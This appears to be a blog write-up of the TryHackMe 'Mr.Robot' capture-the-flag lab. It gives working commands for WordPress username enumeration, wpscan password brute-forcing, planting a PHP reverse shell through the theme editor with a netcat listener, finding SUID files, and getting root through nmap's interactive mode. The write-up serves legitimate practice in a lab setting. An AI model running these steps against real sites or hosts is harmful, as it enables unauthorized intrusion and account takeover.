Post

THM Mr.Robot

Posted
By 2br007
2 min read
THM Mr.Robot

mrrobot

Enumeration

  • As always starting with nmap
  • In parallel run ffuf
1

ffuf -u http://<ip>/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -mc all -fs <some value>
  • While nmap and ffuf running in the terminal, in the browser I found a wordpress login page
  • In wp login form - try sql injection, admin user gives nothing so I decide to try elliot (since it is Mr.Robot room) and I notice that error said wrong password for username elliot, so I got name.
  • Next what I checked - robots file - and it was bingo, there is a dictionary with words (pay attention there are duplicates) and a first key
  • Lets cleanup and keep a uniq only words
1

sort fsociety.dic | uniq > uniq_passwd.txt
  • Since it is wordpress I used wpscan for scan and then to find a password
1

wpscan --url http://<ip> --usernames elliot --passwords passwd_unique.txt
  • After login to the service - on leftside panel in Appearance I saw active Editor so it mean that i’m able to edit files so I updated archive file with php-reverse-shell which I got from /usr/share/webshells/php/php-reverse-shell.php now start netcat
1

nc -lvp 12345
  • Go to http:///wp-content//themes/twentyfifteen/archive.php and catch the shell

Shell stabilization

  • !NB if you will not stabilize the shell you will be not able to switch user!
1

python3 -c 'import pty; pty.spawn("/bin/bash")'
  • Press CTRL+Z to pause the session.
1

stty raw -echo; fg
  • Press Enter
1

export TERM=xterm

Machine investigation

  • Checking available users
1

ls /home
  • There I found a robot user who has 2 files - key2 (which I’m not able to readfrom current user) and some password file with some raw md5 encrypted password. Usually I’m checking this kind of things on crackstation first and only if it is not able to decrypt - try another ways (hashcat or john). So crackstation did the thing quick so now we are able to become a robot user
1

su robot

Privilege escalation

  • sudo -l didn’t work so I tried to find interesting things with sudo permissions
1

find / -type f -perm -4000 2>/dev/null
  • Ok there is nmap so we can check gtfobins how to get a shell via nmap
1
2

/usr/bin/something/nmap --interactive
nmap> !sh
  • So now I’m root and able to read the last key3 file from the root folder. Thans for reading my friend :)
thm, hacking, linux
ctf privilege escalation bash uniq wordpress wpscan ffuf shell stabilization
This post is licensed under CC BY 4.0 by the author.